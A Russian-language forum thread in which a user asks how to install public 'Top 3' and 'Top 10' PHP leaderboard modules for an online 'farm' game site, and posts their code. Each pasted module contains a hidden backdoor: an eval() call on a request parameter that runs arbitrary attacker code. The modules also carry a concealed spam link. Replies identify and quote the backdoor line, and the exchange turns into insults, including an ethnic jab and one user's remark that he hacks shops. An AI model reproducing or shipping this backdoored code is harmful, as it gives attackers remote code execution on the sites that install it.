Автор Тема: Инструкция по установке модуля Tоп  (Прочитано 1368 раз)

0 Пользователей и 1 Гость просматривают эту тему.

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Здравствуйте, есть модули Топ 3 и топ 10, но нет инструкции по установке, очень надеюсь на помощь, а пока .-.0)бамбук:be happy:
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Более 4000 сообщений Топ 10 по созданным темам Топ 10 по сообщениям Более 1000 созданных тем Репутация более 50 Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен. 2015
  • Расположение: Регион 58
  • Возраст: 41
  • Сообщений: 4246
  • Страна: ru
  • Поблагодарили: 1040 раз(а)
  • Репутация +84/-9
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Инструкция по установке модуля Tоп
« Ответ #1 : 04 Июня 2017, 12:35:09 »
Ну как бы сразу вопрос:

Модули из паблика?
Если да,то скорее всего с дырой.

По установке:

Файл модуля ( допустим он называется _top.php) кидаем в папку pages

В корневой .htaccess ставим

# топ
RewriteRule ^top(/?)+$ index.php?menu=top [L]


В корневой index.php ставим
case "top": include("pages/_top.php"); break; // Топ

Вроде как то так должно быть
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #2 : 04 Июня 2017, 12:47:58 »
Да, из паблика, можете глянуть одним глазком нащщет дыр..
Скрипт Топ 10:
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;"><a href="http://mixlip.ru/">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</a></div>

[свернуть]
Спасибо за инструкции ))=(.
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #3 : 04 Июня 2017, 12:55:22 »
Да, из паблика, а где взять не с дырой?
Спасибо за инструкции ))=(.
купить. или самому почистить.
а теперь по делу.
кидай файл топ с обеих модулей посмотрю что там у тебя. бесплатно.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #4 : 04 Июня 2017, 13:01:59 »
Ок, Топ 10
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 10";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 10 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 1000 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 100;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 10");

if($db->NumRows() > 0){

?>




<table width="100%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;"><a href="http://mixlip.ru/">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</a></div>

[свернуть]

Топ 3
Спойлер
<?PHP
$_OPTIMIZATION["title"] = "ТОП 3";
$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>

<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по вводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY insert_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Пополнил</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["insert_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />


<?PHP

$user_id = $_SESSION["user_id"];
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по выводам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_b ORDER BY payment_sum DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Вывел</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["payment_sum"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>

<br />

<?PHP

$user_id = $_SESSION["user_id"];
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}
$db->Query("SELECT * FROM db_users_a, db_users_b WHERE db_users_a.id = db_users_b.id AND db_users_a.id = '$user_id'");
$prof_data = $db->FetchArray();
?>




<div class="s-bk-lf">
   <div class="acc-title">TOP 3 по рефералам</div>
</div>
<div class="silver-bk"><div class="clr"></div>   
<?PHP

$num_p = (isset($_GET["page"]) AND intval($_GET["page"]) < 300 AND intval($_GET["page"]) >= 1) ? (intval($_GET["page"]) -1) : 0;
$lim = $num_p * 30;

$db->Query("SELECT * FROM db_users_a ORDER BY referals DESC LIMIT 3");

if($db->NumRows() > 0){

?>




<table width="30%" border="0">
  <tr bgcolor="#efefef">
    <td align="center" width="75">Место</td>
    <td align="center">Пользователь</td>
   <td align="center">Рефералов</td>
 
  </tr>
 
<?PHP
$i = 0;
   while($data = $db->FetchArray()){
   $i=$i+1;


   ?>

   <tr class="htt">
    <td align="center"><?=$i; ?></td>
    <td align="center"><?=$data["user"]; ?></td>
   <td align="center"><?=$data["referals"]; ?></td>
   
      
     </tr>
   <?PHP
   
   }

?>

</table>
<BR />
<?PHP

}
?>
</div>
<div class="clr"></div>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <div style="display: none;"><a href="http://mixlip.ru/">MixliP-Все для вебмастера! У нас вы найдете скрипты uCoz , сайта ,Dle ,шаблоны,букса,скрипты хайпов,казино и многое другое</a></div>

[свернуть]

Кроме рекламной ссылки которая легко удаляется, вродь и ничего и нету
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #5 : 04 Июня 2017, 13:18:32 »
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #6 : 04 Июня 2017, 14:11:54 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
ах ну да я забыл вы же все спецы. :alas:
а я вот нашел и водном и в другом дыры.
как не старанно но ти тоже незнал я сказал что там дира
a:0:{}
 
Пользователи, которые поблагодарили этот пост: Somnambula

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #7 : 04 Июня 2017, 14:21:00 »
if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']); eval($_REQUEST['user_id']); die();}     вот и сама дира убери и неломанут осторожно

Добавлено сообщение: [time]04 Июнь 2017, 14:13:28[/time]
как не старанно но ти тоже незнал я сказал что там дира
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
ты даже саму дыру не правильно показал лишнего захватил так как тебе айболит показал :laugh:
я об этой дыре узнал когда ты еще пешком под стол ходил.
 
Пользователи, которые поблагодарили этот пост: Somnambula

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #8 : 04 Июня 2017, 14:23:20 »
чего ты хоть за словами следи своими. он мне сказал ты себя хоть слышишь вообще.великий спец. :alas:
я об этой дыре узнал когда ты еще пешком под стол ходил.

ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик

Добавлено сообщение: 04 Июня 2017, 14:25:45
ей прогер макс напиши мне запрос в лс как взломать через етот код еслы я не профи давай жду я по крайней мере знаю а вот ты нет
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #9 : 04 Июня 2017, 14:26:09 »
ах да хтото спрашивал запроси у меня на взлом фф не ты ли случайно скинуть скриншоти хто лохотронщик
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #10 : 04 Июня 2017, 14:33:08 »
и на том сайте все
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
:laugh: давай я не против.
я же должен был тебя развести что бы ты мне все выложил как ты фермы ломаешь людям.

Добавлено сообщение: 04 Июня 2017, 14:30:03
держи . я все там правильно убрал как надо.
рекламу сам уберешь внизу.
кстати на том сайте все скрипты и модули дырявые.
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #11 : 04 Июня 2017, 14:35:35 »
ты даун я не ломаю я наоборот им пишу про дири  только магазини я ломаю и все игри неломаю а тибе х.. я дам просил ти для себя хорошо что ничиво не дал тибе

Добавлено сообщение: 04 Июня 2017, 14:34:15
и ти с... говориш почистил if(!empty($_REQUEST['user_id'])){ if(@get_magic_quotes_gpc())$_REQUEST['user_id']=stripslashes($_REQUEST['user_id']);  вот код баран
:laugh::laugh::laugh: украинець иди гуляй дальше.
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Топ 10 по сообщениям Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #12 : 04 Июня 2017, 14:36:35 »
:laugh::laugh::laugh: украинець иди гуляй дальше.

теперь понятно кому взлом и нужен
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 5 лет на форуме !!! Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Более 1500 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 37
  • Сообщений: 1761
  • Страна: ru
  • Поблагодарили: 144 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Инструкция по установке модуля Tоп
« Ответ #13 : 04 Июня 2017, 14:41:00 »
:laugh::laugh::laugh: украинець иди гуляй дальше.
вот этот кусок который ты показал не обязательно удалять если ты не в курсе.там всего лишь маленький кусочек и все модуль уже не дырявый становится.
 

SomnambulaАвтор темы

  • *
  • Оффлайн
  • Награды Более 4 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Июнь 2017
  • Сообщений: 41
  • Страна: ru
  • Поблагодарили: 5 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Инструкция по установке модуля Tоп
« Ответ #14 : 04 Июня 2017, 14:45:51 »
Блинн...ваще не буду подобные модули ставить
 
 

Совместная покупка модуля "сёрфинг" как в motormoney

Автор PasatonРаздел Совместные покупки

Ответов: 7
Просмотров: 2018
Последний ответ 29 Ноября 2017, 10:54:32
от APTEMOH
Совместная покупка модуля Колесо фортуны как у Rich-Birds

Автор takebetРаздел Совместные покупки

Ответов: 62
Просмотров: 3658
Последний ответ 12 Сентября 2017, 06:02:44
от GameRussia
Совместная покупка модуля Битва между игроками

Автор fordРаздел Совместные покупки

Ответов: 2
Просмотров: 938
Последний ответ 09 Апреля 2017, 03:41:13
от kvozimir
Не могу разобраться с работой модуля конкурса рефералов

Автор siskelruРаздел Вопросы по модулям фруктовых ферм

Ответов: 1
Просмотров: 615
Последний ответ 05 Декабря 2017, 00:17:24
от hdlimon
Подключение автомодерации для модуля серфинг

Автор ZateynikРаздел Разное для фруктовых ферм

Ответов: 12
Просмотров: 4785
Последний ответ 07 Декабря 2017, 08:02:50
от hdlimon